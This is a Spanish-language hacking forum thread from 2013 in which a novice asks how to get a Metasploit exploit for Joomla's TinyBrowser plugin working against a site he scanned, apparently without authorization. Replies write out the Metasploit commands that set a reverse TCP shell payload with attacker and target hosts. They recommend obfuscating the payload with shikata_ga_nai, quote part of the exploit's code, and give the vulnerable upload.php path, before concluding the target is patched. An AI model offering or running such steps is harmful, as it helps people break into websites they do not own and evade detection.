Sólo texto | Texto con Imágenes

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: BCKTR1X en Julio 18, 2013, 04:47:04 AM

Título: [SOLUCIONADO] Ayuda con exploit para Joomla
Publicado por: BCKTR1X en Julio 18, 2013, 04:47:04 AM
Hola a todos  :) he analizado una pagina en joomla y me dice que este plugin  TinyMCE TinyBrowser (creo que es plugin xD ) es vulnerable entonces voy a metasploit y hay un exploit para ese pero al lanzarlo me da este error "[-] Error retrieving obfuscation code!"  :-X no se a que se refiere asi que si alguien sabe que me ayude un poco  :-[
Título: Re:Ayuda con exploit para Joomla
Publicado por: blackdrake en Julio 18, 2013, 07:03:36 AM
Mmmm podrías decirme el nombre del exploit? es este?
Código [Seleccionar]

msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST MIIP
msf exploit(joomla_tinybrowser) > set RHOST OBJETIVO
msf exploit(joomla_tinybrowser) > exploit

Pones todos los datos correctamente?

Puedes ver el código desde aquí y así ves donde te salta el error: http://www.exploit-db.com/exploits/9926/

Un saludo.
Título: Re:Ayuda con exploit para Joomla
Publicado por: Snifer en Julio 18, 2013, 10:19:45 AM
Lo que tienes que hacer es ofuscar el codigo, de tu payload ya que eso es lo que necesitas.

Regards,
Snifer
Título: Re:Ayuda con exploit para Joomla
Publicado por: BCKTR1X en Julio 18, 2013, 09:54:33 PM
Este es "exploit/unix/webapp/joomla_tinybrowser" y como puedo ofuscar el codigo??  ??? soy muy novato
Título: Re:Ayuda con exploit para Joomla
Publicado por: Snifer en Julio 19, 2013, 02:35:04 PM
Te dije el payload -_-! que ofusques revisa sobre MSFVENOM MSFENCODE ;)

Encoding: x86/shikata_ga_nai este es el mas usado

Regards,
Snifer
Título: Re:Ayuda con exploit para Joomla
Publicado por: BCKTR1X en Julio 19, 2013, 04:15:42 PM
jajaja ok  ;D gracias por responder  :)
Título: Re:Ayuda con exploit para Joomla
Publicado por: Psymera en Julio 19, 2013, 08:49:58 PM
No de echo el error lo que marca es que la ofuscacion de codigo fallo asi que tienes que desactivarla xD, eso es comun por que no funciona con php xD
asi que es un error del metasploit solo quita esa opcion y mandalo directo y jala tambien el tiny se puede hacer explotacion a mano :p no es nada dificil
Título: Re:Ayuda con exploit para Joomla
Publicado por: BCKTR1X en Julio 19, 2013, 11:30:45 PM
 :o Me puedes pasar el exploit o explicarme como hacerlo a mano  ;D
Título: Re:Ayuda con exploit para Joomla
Publicado por: Psymera en Julio 20, 2013, 04:23:53 AM
Bien nadie le dio una leida al codigo, lo que sale aqui es que esta parchado
Código [Seleccionar]
        if (res)
             
            if(res.body =~ /"obfus", "((\w)+)"\)/)
                obfuscation_code = $1
                print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
            else
                print_error("Error retrieving obfuscation code!")
                return
            end
        end


por eso te sale del codigo de ofuscacion y muere es un codigo que se ocupa para que sea valida la peticion si entras manualmente al lugar te va a mandar al cuerno en pocas palabras esta parchado http://target/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=
Sólo texto | Texto con Imágenes